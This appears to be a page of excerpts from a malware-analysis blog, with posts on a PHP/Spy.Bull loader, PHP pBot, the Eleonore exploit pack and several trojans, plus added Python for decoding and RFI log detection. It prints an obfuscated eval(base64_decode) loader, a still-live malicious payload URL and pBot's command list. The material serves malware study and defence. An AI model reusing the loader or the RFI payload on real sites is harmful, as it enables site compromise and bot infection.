
evilcry's blog

PHP/Spy.Bull Cryptanalysis of Encryption used and Threat Analysis

Today we're going to locate a PHP/Spy.Bull infected target, cryptanalyze the
encoded blocks involved and finally analyze the resulting threat.

It's clear that the cryptanalysis part is overkill for the study of this particular threat; what I want to show here is a different, more pragmatic and general approach to the problem.

This procedure can be used in much more complex contexts, where the encryption is stronger than in our case and there is a serious lack of information.

This PHP malware is served from compromised websites as an encrypted page; the classical anatomy of an infected URL is

http://____.dk/____/_____/one.txt??

Let's now see this page.

eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

As you can see we have two blocks of encrypted data:

1. The first one does not help us at this moment, because we have no explicit information about the encryption algorithm used, but we can pragmatically measure how complex this ciphertext is.
2. The second block we can decode directly: it is simply Base64 encoded.

At first look it's obvious that the first code block uses an encryption that should not be too hard. But this is only a supposition; we have to demonstrate it:

1. Is it really as easy as it appears?
2. Can we measure how complex it is?

It could happen that an apparently easy block is the result of complex operations.
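Here is an added worked example (my own code, not from the original post) that decodes the second block exactly as given above, pulls the two strtr() alphabets out of the recovered loader, and replays the same two operations on a stage-1 block. The real first block is not reproduced on this page, so the example builds a constructed one from a sample PHP string with the inverse transformation. The entropy helper makes the "can we measure how complex it is" question concrete: strtr() here is just a permutation of eleven characters, so the byte histogram, and with it the entropy, of the decoded stage-1 block is identical to that of the plaintext, which is what a weak substitution gives you and a real cipher does not.

```python
"""Decode the two-stage PHP/Spy.Bull loader and measure the ciphertext."""
import base64
import math
import re
from collections import Counter

# The second block, copied verbatim from the infected page: the argument of
# eval(base64_decode('...')) with the line wrapping removed.
LOADER_B64 = (
    "JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9"
    "c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF"
    "9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfW"
    "Ck7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=="
)

# strtr($_X,'<from>','<to>') as emitted by this loader family.
STRTR_RE = re.compile(r"strtr\(\$_X,'([^']*)','([^']*)'\)")


def decode_loader(b64: str) -> str:
    """Stage 2: plain Base64, gives back the PHP that decodes stage 1."""
    return base64.b64decode(b64).decode("ascii")


def extract_strtr_alphabets(loader_src: str) -> tuple:
    """Pull the two strtr() alphabets out of the decoded loader source."""
    m = STRTR_RE.search(loader_src)
    if m is None:
        raise ValueError("no strtr() call found; not this loader family")
    frm, to = m.group(1), m.group(2)
    if len(frm) != len(to):
        raise ValueError("strtr alphabets differ in length")
    return frm, to


def decode_first_block(first_block_b64: str, loader_src: str) -> str:
    """Replay the loader on stage 1: base64_decode(), then strtr(from, to).

    The ereg_replace() of __FILE__ is left out: it only inlines the path of
    the infected file (via $_F) and plays no part in the decryption.
    """
    frm, to = extract_strtr_alphabets(loader_src)
    raw = base64.b64decode(first_block_b64).decode("latin-1")
    return raw.translate(str.maketrans(frm, to))


def encode_first_block(php_src: str, loader_src: str) -> str:
    """Inverse of decode_first_block; used here only to build a constructed
    sample stage-1 block, since the real one is not reproduced on the page."""
    frm, to = extract_strtr_alphabets(loader_src)
    # strtr(from, to) is a bijection on the characters it touches, so the
    # inverse is simply strtr(to, from).
    obf = php_src.translate(str.maketrans(to, frm))
    return base64.b64encode(obf.encode("latin-1")).decode("ascii")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: output of a real cipher sits near 8, text near 4-5."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def analyse(first_block_b64: str, loader_b64: str) -> dict:
    """Full pipeline: recover the loader, its alphabets, the plaintext, and
    the entropy before and after the substitution is undone."""
    loader_src = decode_loader(loader_b64)
    inner = base64.b64decode(first_block_b64)
    plain = decode_first_block(first_block_b64, loader_src)
    return {
        "loader": loader_src,
        "alphabets": extract_strtr_alphabets(loader_src),
        "entropy_after_base64": shannon_entropy(inner),
        "entropy_plaintext": shannon_entropy(plain.encode("latin-1")),
        "plaintext": plain,
    }


# Constructed sample stage-1 block (NOT the real infected page's block).
SAMPLE_PHP = '<?php $_F=__FILE__; echo "spy.bull sample 123456"; ?>'
SAMPLE_FIRST_BLOCK = encode_first_block(SAMPLE_PHP, decode_loader(LOADER_B64))

if __name__ == "__main__":
    r = analyse(SAMPLE_FIRST_BLOCK, LOADER_B64)
    print(r["loader"])
    print("strtr alphabets:", r["alphabets"])
    print("entropy of stage 1 after base64: %.3f" % r["entropy_after_base64"])
    print("entropy of recovered plaintext:  %.3f" % r["entropy_plaintext"])
    print(r["plaintext"])
```

Running it prints the recovered loader, `$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;`, which tells you everything about stage 1: it is Base64 under a swap of the characters 1-6 with a, o, u, i, e, and the stage-1 code is expected to set `$_F` to `__FILE__` before the loader runs. The two printed entropies are equal to the last decimal, the signature of a simple substitution. As a dating aid, `ereg_replace()` was removed in PHP 7, so this loader only runs on older deployments.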

DNAScan Malicious Network Activity Reverse Engineering

Hi,

This paper is split into several episodes; the first two can be read here:

First
http://evilcodecave.blogspot.com/2009/11/dnascan-malware-analysis-from-browser.html
Second
http://evilcodecave.blogspot.com/2009/11/dnascan-malware-analysis-from-browser_15.html

In this blog post we will investigate in depth the actual functionality of DNAScan,
which can be seen as a set of threads that accomplish different networking functions:

* Server Functionalities
* Client Functionalities
* Malicious File Exchange
* Generic Backdoor

Let's start from the beginning of the network setup: first the main thread calls WSAStartup to initialise the Winsock DLL, then a classical socket(), and immediately afterwards WSAIoctl

[Crimeware] Researches and Reversing about Eleonore Exploit Pack

Hi,

Today we will see how the Eleonore Exploit Pack works, directly from an infected website.

Essentially, Eleonore Exploit Pack is a collection of exploits and data statistics collectors; this is the 'marketing' presentation of the exploit pack:

*---------------------------------------------------------------*
Hello!
I present new actual russian exploits pack "Eleonore Exp v1.2"

Exploits on pack:
> MDAC
> MS009-02
> Telnet - Opera
> Font tags - FireFox
> PDF collab.getIcon
> PDF Util.Printf
> PDF collab.collectEmailInfo
> DirectX DirectShow
> Spreadsheet

PHP pBot Dissection

Today I'll dissect a website infected with PHP:Pbot-A, according to the Avast naming convention.

Be careful, the link reported is still alive!

From a malicious-domain DB this infected URL emerged:

http://jamera2.justfree.com/cmdupload2.txt

As you can see it looks like an ordinary .txt file, but this is classic evidence of an RFI (Remote File Inclusion) infection: the bot source is hosted as plain text and pulled in by a vulnerable include() on the victim site.

MD5 : da67134fc6953201d3556f5fedbcd50d

/*
*
* #crew@corp. since 2003
* edited by: devil__ and MEIAFASE
* Friend: LP
* COMMANDS:
*
* .user //login to the bot
* .logout //logout of the bot
* .die //kill the bot
* .restart //restart the bot
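The remark above that a .txt file fetched over HTTP is classic RFI evidence suggests the matching check on the victim side. The following is an added example (not code from the original post): it scans web server access-log lines in the common/combined format for query parameters whose value is a remote URL, rating as high the hits that point at a .txt file or carry the trailing '?'/'??' that turns whatever the vulnerable script appends into a query string. The log lines are constructed for the example; the first two embed the URL reported above, once raw and once percent-encoded.

```python
"""Flag Remote File Inclusion attempts in web server access logs."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx common or combined log format: we only need client, timestamp,
# method, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself an absolute URL is what include($_GET[...])
# turns into a remote fetch when allow_url_include is enabled.
REMOTE_RE = re.compile(r'^(?:https?|ftps?)://', re.I)


def classify_remote_value(value: str) -> str:
    """'high' for the classic pBot tell (a .txt payload and/or a trailing
    '?' or '??' that neutralises anything the script appends to the path),
    'low' for any other remote URL handed to a parameter."""
    remote = urlsplit(value)
    if remote.path.lower().endswith(".txt") or value.endswith("?"):
        return "high"
    return "low"


def rfi_hits(line: str) -> list:
    """Return one dict per query parameter whose value is a remote URL."""
    m = LOG_RE.match(line)
    if m is None:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already percent-decodes once; decode a second time so a
        # double-encoded payload (http%253A%252F%252F...) is caught as well.
        value = unquote(value)
        if REMOTE_RE.match(value):
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": m.group("status"),
                "param": name,
                "url": value,
                "severity": classify_remote_value(value),
            })
    return hits


def scan(lines) -> list:
    """Run rfi_hits over an iterable of log lines and flatten the result."""
    return [h for line in lines for h in rfi_hits(line)]


# Constructed access-log lines for the example (not from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Nov/2009:10:01:02 +0000] "GET /index.php?page=http://jamera2.justfree.com/cmdupload2.txt?? HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Nov/2009:10:01:09 +0000] "GET /index.php?page=http%3A%2F%2Fjamera2.justfree.com%2Fcmdupload2.txt%3F%3F HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [12/Nov/2009:10:02:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [12/Nov/2009:10:03:00 +0000] "GET /redirect.php?url=http://example.org/news HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f'{h["severity"]:4} {h["ip"]} {h["ts"]} param={h["param"]} -> {h["url"]}')
```

A 200 status on a high hit is the line to chase: it means the include most likely succeeded and the bot is already running under the web server's account, so the next step is the server's outbound connections to the IRC C&C rather than the log.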

Swimming into Trojan and Rootkit GameThief Win32 Magania Hostile Code

Hi,

Here my last paper.

Abstract

Trojan-GameThief.Win32.Magania, according to the Kaspersky naming convention, monitors the user's activities trying to obtain valuable information from the affected user, especially gaming login accounts. This long tutorial analyzes this malware, but it is also a general document which explains how to analyze modern nested-doll malware.

http://www.accessroot.com/arteam/site/download.php?view.313

Regards,
Giuseppe 'Evilcry' Bonfa'

Backdoor UltimateDefender Reverse Engineering

Hi,

Here is the reverse engineering of Backdoor UltimateDefender,
a malware that also presents rootkit functionality.

http://evilcry.netsons.org/tuts/Mw/Backdoor-UltimateDefender.pdf

Regards,
Giuseppe 'Evilcry' Bonfa'

W32/Skintrim Reversing of a Badly Coded Mw

Hi,

Here I've linked the first three parts of W32/Skintrim, Reverse Engineering of a Badly Coded Malware:
a malware that does not work and appears very small. I've repaired it and I'm reversing it completely;
Skintrim turned out to be quite elaborate.

Here are the first three blog posts:

#1
#2
#3

Soon I will publish the #4 part.

Regards,
Giuseppe 'Evilcry' Bonfa'

The MSN Dark Chain of Spam - yopicz.com and others

Hi,

Yesterday I published a blog post about spam domains spreading over MSN:

http://evilcodecave.wordpress.com/2008/08/26/the-msn-dark-chain-of-spam-yopiczcom-and-others/

Regards,
Giuseppe 'Evilcry' Bonfa'

Paper on Win32OnlineGames

Hello,

In the following paper you can read the analysis of Win32OnlineGames, a widely spread Trojan that acts as a password stealer for online gaming services.

Win32OnlineGames

Hope you like it!

Regards,
Giuseppe 'Evilcry' Bonfa'

Paper on Trojan-DownloaderWin32Small

Hello,

Here you can find a reverse engineering analysis of Trojan-DownloaderWin32Small, a widespread Trojan that is usually distributed through websites.

Trojan-DownloaderWin32Small

Have a nice read..

Regards,
Giuseppe 'Evilcry' Bonfa'
